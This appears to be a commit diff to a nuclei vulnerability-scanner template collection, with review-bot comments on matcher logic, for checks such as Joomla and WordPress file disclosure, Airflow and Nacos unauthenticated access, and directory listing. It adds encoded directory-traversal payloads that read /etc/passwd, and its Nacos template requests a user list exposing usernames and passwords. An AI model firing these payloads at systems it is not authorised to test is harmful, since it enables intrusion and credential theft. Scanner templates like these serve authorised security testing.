diff --git a/README.md b/README.md
index c7838f77a8..9cedaad55e 100644
--- a/README.md
+++ b/README.md
@@ -45,6 +45,7 @@ An overview of the nuclei template directory including number of templates assoc
 **63 directories, 609 files**.
+
diff --git a/fuzzing/directory-traversal.yaml b/fuzzing/directory-traversal.yaml
index df2f9d7d23..7c44cee4cc 100644
--- a/fuzzing/directory-traversal.yaml
+++ b/fuzzing/directory-traversal.yaml
@@ -24,6 +24,13 @@ requests:
 - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
 - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
 - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
+ - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
+ - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
+ - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
+ - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
+ - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
+
 matchers-condition: and
 matchers:
 - type: status
diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml
new file mode 100644
index 0000000000..cbaf0cf796
--- /dev/null
+++ b/miscellaneous/joomla-htaccess.yaml
@@ -0,0 +1,29 @@
+id: joomla-htaccess-file
+
+info:
+ name: Joomla htaccess file disclosure
+ author: oppsec
+ severity: info
+ description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/htaccess.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "# @package Joomla"
+ - "Open Source Matters. All rights reserved"
+ condition: and
+
+ - type: word
+ words:
+ - "text/plain"
+ part: header
+
+ - type: status
+ status:
+ - 200
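Review bot: The first added path, `- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"`, decodes to a single sixteen-dot path component with no separator in it, so it can never resolve to a parent directory and only adds a dead request to every scan; I would drop that entry. The `path:` list this hunk extends starts above it, and the matcher that decides a hit continues past `- type: status`, so the body check is not visible here.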
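Review bot: The new `info:` block has no `tags:` entry, so this template cannot be selected by tag the way the wordpress-user-enumeration hunk in this same commit can with its `tags: wordpress`; add `tags: joomla` after `severity: info`. The same omission is in miscellaneous/joomla-manifest-file.yaml and vulnerabilities/wordpress/wp-uploads-listing.yaml in this commit. The header matcher on the bare word `"text/plain"` is looser than the `"Content-Type: text/html"` and `"Content-Type: application/json"` forms used in the airflow and nacos hunks here, since any header carrying that substring satisfies it; `- "Content-Type: text/plain"` keeps the three consistent. The description also reads awkwardly; `description: Joomla ships an htaccess.txt file holding HTTP and directory-listing configuration.` says the same thing cleanly.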
diff --git a/miscellaneous/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml
new file mode 100644
index 0000000000..6195def552
--- /dev/null
+++ b/miscellaneous/joomla-manifest-file.yaml
@@ -0,0 +1,29 @@
+id: joomla-manifest-file
+
+info:
+ name: Joomla manifest file disclosure
+ author: oppsec
+ severity: info
+ description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/administrator/manifests/files/joomla.xml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "admin@joomla.org"
+ - "www.joomla.org"
+ condition: and
+
+ - type: word
+ words:
+ - "application/xml"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml
index 4db232a58f..1c14b4f895 100644
--- a/misconfiguration/unauthenticated-airflow.yaml
+++ b/misconfiguration/unauthenticated-airflow.yaml
@@ -14,9 +14,15 @@ requests:
 matchers:
 - type: word
 words:
- - Airflow - DAGs
+ - "Content-Type: text/html"
+ part: header
+
+ - type: word
+ words:
+ - "Airflow - DAGs"
 part: body
+ condition: and
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml
index 516f1b6254..35e0b30cdc 100644
--- a/misconfiguration/unauthenticated-nacos-access.yaml
+++ b/misconfiguration/unauthenticated-nacos-access.yaml
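Review bot: The description says joomla.xml discloses the installed version, but the matchers only confirm the file is served and the finding carries no version, which is the part an asset owner needs for inventory and patch tracking. An `extractors:` entry of `type: regex` over the body would surface the manifest's `<version>` element (a value such as `<version>3.9.24</version>`, constructed example) without touching the match logic; the block below sits after `matchers:` at the request level. The description wording could also be tightened to `description: joomla.xml is an XML manifest that records the installed Joomla version, files and paths.`

```yaml
    # … unchanged: matchers-condition and matchers …
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '<version>([0-9.]+)</version>'
```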
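Review bot: `condition: and` on the second word matcher has no effect, because that matcher lists a single word, `"Airflow - DAGs"`; drop the line, or keep it only once more words are added. The new `"Content-Type: text/html"` gate only narrows the old match, so the template still reports any HTML page whose body contains that title; if the Airflow login page renders the same title, an instance that is properly protected would be flagged as unauthenticated too, which is worth confirming against a protected instance before merging. The `requests:` entry these matchers belong to begins above the hunk.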
@@ -1,30 +1,34 @@
 id: unauthenticated-nacos-access
 info:
- name: Unauthenticated Nacos access
- author: taielab
+ name: Unauthenticated Nacos access v1.x
+ author: taielab & @pikpikcu
 severity: critical
-
- # References:
- # - https://github.com/alibaba/nacos/issues/4593
+ issues: https://github.com/alibaba/nacos/issues/4593
 requests:
- - raw:
- - |
- GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Nacos-Server
- Content-Length: 2
+ - method: GET
+ path:
+ - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
+ - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
+ headers:
+ User-Agent: Nacos-Server
 matchers-condition: and
 matchers:
+
+ - type: word
+ words:
+ - "Content-Type: application/json"
+ part: header
+
 - type: regex
 regex:
 - '"username":'
 - '"password":'
- - '"totalCount":'
- condition: and
 part: body
+ condition: and
+
 - type: status
 status:
 - 200
diff --git a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml
index f109bebade..c06644e07a 100644
--- a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml
+++ b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml
@@ -2,7 +2,7 @@ id: wordpress-user-enumeration
 info:
 name: Wordpress user enumeration
- author: Manas_Harsh
+ author: Manas_Harsh & daffainfo
 severity: info
 tags: wordpress
@@ -10,6 +10,7 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/wp-json/wp/v2/users/"
+ - "{{BaseURL}}/?rest_route=/wp/v2/users/"
 matchers-condition: and
 matchers:
 - type: status
diff --git a/miscellaneous/wp-license.yaml b/vulnerabilities/wordpress/wp-license-file.yaml
similarity index 94%
rename from miscellaneous/wp-license.yaml
rename to vulnerabilities/wordpress/wp-license-file.yaml
index 35ab078af8..f2ee4bbc05 100644
--- a/miscellaneous/wp-license.yaml
+++ b/vulnerabilities/wordpress/wp-license-file.yaml
@@ -1,4 +1,4 @@
-id: wp-license
+id: wp-license-file
 info:
 name: WordPress license file disclosure
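Review bot: `issues: https://github.com/alibaba/nacos/issues/4593` replaces the old comment with a key that is not one of the conventional nuclei `info:` fields, so anything that reads template references will not pick it up; the usual key is `reference: https://github.com/alibaba/nacos/issues/4593`. The rename to `Unauthenticated Nacos access v1.x` is not backed by any check in the matchers, which only confirm a JSON body containing `"username":` and `"password":`, so the version in the name is scope rather than something the template verifies; a `description:` line saying which Nacos releases are meant would make that clear. Dropping the `'"totalCount":'` regex widens the match to any JSON body that carries those two keys, presumably to accommodate the new `/v1/auth/users` path; a short comment on why it was removed would help the next maintainer.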
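Review bot: With a second `path:` entry and no `stop-at-first-match: true` on the request, a host that answers both `/wp-json/wp/v2/users/` and `/?rest_route=/wp/v2/users/` produces two findings for the same issue; adding `stop-at-first-match: true` under `- method: GET` avoids the duplicate, provided the nuclei version in use supports that option. The matchers for this request begin at `- type: status` at the end of the hunk and continue outside it, so whether they further distinguish the two responses is not visible here.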
diff --git a/vulnerabilities/wordpress/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml
new file mode 100644
index 0000000000..bc2f614fd8
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-uploads-listing.yaml
@@ -0,0 +1,31 @@
+id: wp-uploads-listing
+
+info:
+ name: WordPress Upload Directory Listing Enable
+ author: yashgoti
+ severity: info
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/"
+ - "{{BaseURL}}/wp-content/uploads/2015/"
+ - "{{BaseURL}}/wp-content/uploads/2016/"
+ - "{{BaseURL}}/wp-content/uploads/2017/"
+ - "{{BaseURL}}/wp-content/uploads/2018/"
+ - "{{BaseURL}}/wp-content/uploads/2019/"
+ - "{{BaseURL}}/wp-content/uploads/2020/"
+ - "{{BaseURL}}/wp-content/uploads/2021/"
+ - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Directory listing for"
+ - "Index of /"
+ - "[To Parent Directory]"
+ - "Directory: /"
+
+ - type: status
+ status:
+ - 200
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml
index 71d5dc5a5e..36be8a7c7b 100644
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@@ -44,3 +44,5 @@ workflows:
 - template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
 - template: vulnerabilities/wordpress/wp-enabled-registration.yaml
 - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
+ - template: vulnerabilities/wordpress/wp-uploads-listing.yaml
+ - template: vulnerabilities/wordpress/wp-license-file.yaml
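Review bot: The year directories are hard-coded as `2015/` through `2021/`, so coverage silently stops at the next calendar year and the list needs a manual bump each January; the plain `/wp-content/uploads/` root already answers the question on most servers that enable listing, and the per-year paths presumably only matter where the root is blocked, which is worth stating in a `description:` so a maintainer knows whether to keep extending the list. With nine paths and no `stop-at-first-match: true`, a host with listing enabled throughout also yields up to nine findings for one misconfiguration. `name: WordPress Upload Directory Listing Enable` reads as a verb; `name: WordPress Upload Directory Listing Enabled` is what is meant.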